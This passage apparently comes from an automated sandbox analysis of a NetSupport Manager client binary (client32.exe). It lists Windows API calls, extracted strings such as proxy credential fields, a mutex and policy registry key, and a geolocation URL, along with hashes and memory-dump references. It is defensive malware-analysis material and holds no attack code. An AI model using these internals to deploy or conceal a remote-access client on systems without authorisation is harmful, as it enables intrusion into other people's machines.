                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection$CloseCreateEnvironmentErrorExitExpandHandleLastMessageProcessStringsThreadwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL$tj
                                                                                                                                                                                                    • API String ID: 2317329843-624511195
                                                                                                                                                                                                    • Opcode ID: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
                                                                                                                                                                                                    • Instruction ID: 96e53a99b37afd88effbccddcb99d5044153cbf19089882f4136f072ae1633ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b64db9be393d21858828107b08024ed2c37c646a5a2dcafe481e79fb9172f6ad
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A71EAB1B00309AFE711DBA4CC85FE9F7B5BB88704F0084A9E3159B281EB70B944CB65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                                                                                                                    • API String ID: 2111968516-2157635994
                                                                                                                                                                                                    • Opcode ID: 8b63a1dac977ab35b8c47f62be936f8e6fe2423304d8069a5d6a5a9d72322eb6
                                                                                                                                                                                                    • Instruction ID: 9668ebde70b29493483c650e7e485da13943312fc57ec0df0c8d21fe434bcc19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b63a1dac977ab35b8c47f62be936f8e6fe2423304d8069a5d6a5a9d72322eb6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B422B5B2A04358AFDB25CFA4CC80EEEB3BDAB49304F8485D9E55967540D6329F84CF52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PCIINV.DLL,BBC4A55B,027F70A0,027F7090,?,00000000,1117ED9C,000000FF,?,11031392,027F70A0,00000000,?,?,?), ref: 11084F85
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,771CC310,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1108505B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085072
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11085089
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BD8
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BEB
                                                                                                                                                                                                      • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084BFE
                                                                                                                                                                                                      • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,75C1F550,?,?,11085200,?,11031392,027F70A0,00000000,?,?,?), ref: 11084C11
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad
                                                                                                                                                                                                    • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                                                    • API String ID: 1281665014-2492245516
                                                                                                                                                                                                    • Opcode ID: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
                                                                                                                                                                                                    • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e79e8737a57767a360234bba90a97f9ccf4e5079ef7247a1568b48b9923ce02a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                                                    • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                                                    • API String ID: 2061479752-1320826866
                                                                                                                                                                                                    • Opcode ID: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
                                                                                                                                                                                                    • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3419b364451b030f4c1ae17ea76cb3df227c77bbc6b46c8a377cef6aa527b1dd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027E84
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027F01
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait
                                                                                                                                                                                                    • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                                                    • API String ID: 2132705056-1744591295
                                                                                                                                                                                                    • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 11030457
                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 11030465
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
                                                                                                                                                                                                    • API String ID: 711497182-3782231422
                                                                                                                                                                                                    • Opcode ID: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
                                                                                                                                                                                                    • Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbf71ec49f53600c72b87a96e154c6fc632858b50e963b64517ef1cdb7f6b3f1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76596610,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 110303C3
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(023A8D48,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue
                                                                                                                                                                                                    • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 1342853979-2190704750
                                                                                                                                                                                                    • Opcode ID: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
                                                                                                                                                                                                    • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b59737b017a528acb193203f0270af2f5a2ea3ef6b731abf40abcba2d20a93b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                                                                                                      • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountObjectSingleTickWait$CloseEventHandlewvsprintf
                                                                                                                                                                                                    • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
